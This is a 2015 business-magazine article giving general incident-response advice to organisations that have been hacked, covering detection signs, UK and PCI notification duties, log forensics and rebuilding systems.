So you've been hacked - what now? by Chloe Green

15/01/2015 06:52

Organisations need to start assuming they will be hacked, and responding accordingly.

In 2011 the government claimed that cyber crime costs the UK economy £27 billion a year. It’s doing serious damage to both the public and private sectors. CEOs and the rest of the board shouldn’t be asking ‘will we get hacked?’, but instead ‘when will we get hacked?’. It has become an inevitability. Businesses need to know how to respond.

But when you get hacked a ‘you have been hacked’ alert won’t suddenly appear on your computer screen. There might be quite obvious consequences, such as your website being defaced. But when someone has intent it’s likely you’ll become suspicious because of subtle and not so subtle things happening as a result of the hack. 

There may be technical indicators such as machines running slowly, accounts not working, software malfunctioning or unexpected activity in system logs. However unless you’re watching diligently for these signs then more often than not it is the other activities of the perpetrators that will first raise suspicion.

What should you do?

Naturally our advice would be to call in the professionals and make sure they are CREST certified, which is the industry standard.

> See also: The year of the security breach: 6 lessons learned from 2014

In a recent case we responded to, before we were called in the company had tried to kick the hackers out. This led to a game of cat and mouse and some goading on behalf of the attackers. 

However, if you can’t afford expert help then our first advice would be to disable the affected systems to reduce further impact. Then, if you don’t wish to get law enforcement involved, attempt to understand how it happened. If you want to call in the police then the crime scene needs to be preserved. 

Without understanding how it happened there is a risk you will recover, miss the original entry point and allow the attackers straight back in, causing you further frustration and anxiety. 

What are the laws, and do you need to inform people? 

The data protection act (DPA) does not require you to inform the Information Commissioner’s Office (ICO). However, the ICO advises you to inform it in the case of a serious breach – further details can be found in its briefing document.

If you process credit card data you’ll come under the Payment Card Industry (PCI) requirements. Whilst not a law, there is a requirement in these instances to inform the major card companies (VISA, American Express etc.) within 24 hours. VISA and MasterCard also require you to undertake a forensics investigation.

How do you find out what's gone and how do you plug the hole?

Finding out what went on and how to plug the hole will require a technical capability to comb through available logs and other sources of forensics data. We typically find that SMEs don’t pro-actively configure logging so become reliant on the default logs provided by their computers, web sites and databases. Only by analysing these will you be able to build up a picture of the activity and identify potential losses. However, be prepared to not always be able to answer this question fully, either through lack of logging or if a savvy attacker has erased the logs.

> See also: The 2015 cyber security roadmap

How do you repair systems and rebuild trust?

The general wisdom is to rebuild the affected systems from scratch rather than trying to repair. In reality, this might not be possible so it’s critical you have understood how the attacker got in, that you’ve confirmed the hole is closed and they are not resident via other technical mechanisms. Then change all passwords, make sure all software is updated, all logging is functioning and look to rebuild trust in the systems.

Sourced from Rob Cotton, CEO at global information assurance firm NCC Group

See more at: